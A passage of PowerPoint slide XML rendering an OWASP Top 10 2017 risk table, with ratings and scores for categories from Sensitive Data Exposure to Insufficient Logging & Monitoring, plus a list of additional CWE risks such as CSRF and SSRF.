                      <a:endParaRPr lang="en-US" sz="1200" b="1" baseline="0"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AVERAGE</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SEVERE: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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>7.0</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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A3:2017-</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sens.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Data Exposure</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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AVERAGE</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a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WIDESPREAD: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200"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AVERAGE</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SEVERE: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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>7.0</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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4:2017-XML </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exter-nal</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Entities (XXE)</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AVERAGE</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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>COMMON: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" baseline="0"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EASY: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SEVERE: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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>7.0</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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">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A5:2017-Broken Access Control</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chemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="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AVERAGE</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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>COMMON: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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1" baseline="0"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AVERAGE</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SEVERE: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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="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a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>6.0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>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34400579"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="287988">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900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A6:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-Security Misconfiguration</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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EASY: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baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WIDESPREAD: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200"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EASY: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MODERATE: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>6.0</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6"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">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A7:2017-Cross-Site Scripting (XSS)</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EASY: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baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WIDESPREAD: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200"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EASY: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MODERATE: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>6.0</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7"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8:2017-Insecure Deserialization</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DIFFICULT</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1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:sym typeface="Wingdings"/>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en-US" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>COMMON: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" baseline="0"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AVERAGE</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SEVERE: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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>5.0</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8"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">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A9:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Vulnerable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Components</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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AVERAGE</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a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WIDESPREAD: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200"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AVERAGE</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MODERATE: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>4.7</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9"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">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A10:2017-I</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>nsufficient</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" kern="1200" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>&amp;Monitoring</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>App Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="80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AVERAGE</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a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WIDESPREAD: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200"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DIFFICULT</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1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:sym typeface="Wingdings"/>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MODERATE: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">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algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>4.0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10"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="15" name="Table 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2849323628"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="6553201"/>
          <a:ext cx="6858000" cy="25936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2480">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Additional Risks to Consider</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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2258320">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r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The Top 10 covers a lot of ground, but there are many other risks you should consider and evaluate in your organization. Some of these have appeared in previous versions of the Top 10, and others have not, including new attack techniques that are being identified all the time. Other important application security risks (ordered by CWE-ID) that you should additionally consider include</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</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4"/>
                        </a:rPr>
                        <a:t>CWE-352: Cross-Site Request Forgery (CSRF)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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5"/>
                        </a:rPr>
                        <a:t>CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion', '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>AppDoS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>')</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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6"/>
                        </a:rPr>
                        <a:t>CWE-434: Unrestricted Upload of File with Dangerous Type</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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7"/>
                        </a:rPr>
                        <a:t>CWE-451: User Interface (UI) Misrepresentation of Critical Information (Clickjacking and others)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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8"/>
                        </a:rPr>
                        <a:t>CWE-601: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Unvalidated</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t> Forward and Redirects</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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9"/>
                        </a:rPr>
                        <a:t>CWE-799: Improper Control of Interaction Frequency (Anti-Automation)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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10"/>
                        </a:rPr>
                        <a:t>CWE-829: Inclusion of Functionality from Untrusted Control Sphere (3rd Party Content)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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11"/>
                        </a:rPr>
                        <a:t>CWE-918: Server-Side Request Forgery (SSRF)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">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0" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="2627763"/>
            <a:ext cx="995283"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Prevalence</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3897232" y="2627763"/>
            <a:ext cx="903369"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Detectability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759009" y="2627763"/>
            <a:ext cx="956796"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Exploitability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4952356" y="2627763"/>
            <a:ext cx="869908"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Technical</a:t>
